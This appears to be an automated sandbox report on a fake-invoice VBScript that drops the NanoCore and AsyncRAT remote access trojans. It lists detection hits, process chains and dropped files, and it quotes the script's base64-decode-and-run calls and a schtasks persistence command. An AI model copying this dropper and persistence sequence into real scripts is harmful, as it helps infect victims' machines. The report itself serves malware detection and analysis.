            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: dhcpmon.exe.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.999787946429
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: ame.exe.1.dr, Client/Settings.cs Base64 encoded string
            Source: Notepads.exe.3.dr, Client/Settings.cs Base64 encoded string
            Source: 3.2.ame.exe.500000.0.unpack, Client/Settings.cs Base64 encoded string
            Source: 3.0.ame.exe.500000.0.unpack, Client/Settings.cs Base64 encoded string
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Settings.cs Base64 encoded string
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Settings.cs Base64 encoded string
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@14/9@20/3
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023410DA AdjustTokenPrivileges,4_2_023410DA
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023410A3 AdjustTokenPrivileges,4_2_023410A3
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File created: C:\Program Files (x86)\DHCP Monitor
            Source: C:\Users\user\AppData\Local\Temp\ame.exe File created: C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Users\user\AppData\Roaming\Notepads.exe Mutant created: \Sessions\1\BaseNamedObjects\871-085a33d91457
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{ac555290-50d4-4120-9390-e76e4f948dd7}
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ame.exe
            Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Notepads.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Roaming\Notepads.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: Invoice No F1019855_PDF.vbs Virustotal: Detection: 29%
            Source: Invoice No F1019855_PDF.vbs ReversingLabs: Detection: 23%
            Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown Process created: C:\Users\user\AppData\Roaming\Notepads.exe C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

            Data Obfuscation:

            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\ame.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALKNKPEAAAAAAAAAAOAAIgALATAAANIBAAAIAAAAAAAA7vE");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\ame.exe", "2");IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKEn6VQAAAAAAAAAAOAADgELAQYAAMgBAABgAQAAAAAAkuc");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\fi.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\ame.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\fi.exe")
            .NET source code contains potential unpacker
            Source: ame.exe.1.dr, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr Static PE information: 0xF1288DB2 [Tue Mar 18 07:39:30 2098 UTC]
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E5BA1 push E87220CAh; ret 4_2_022E5C26
            Source: dhcpmon.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names
            Source: dhcpmon.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ame.exe
            Source: C:\Users\user\AppData\Local\Temp\ame.exe File created: C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fi.exe
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

            Boot Survival:

            Yara detected AsyncRAT
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage
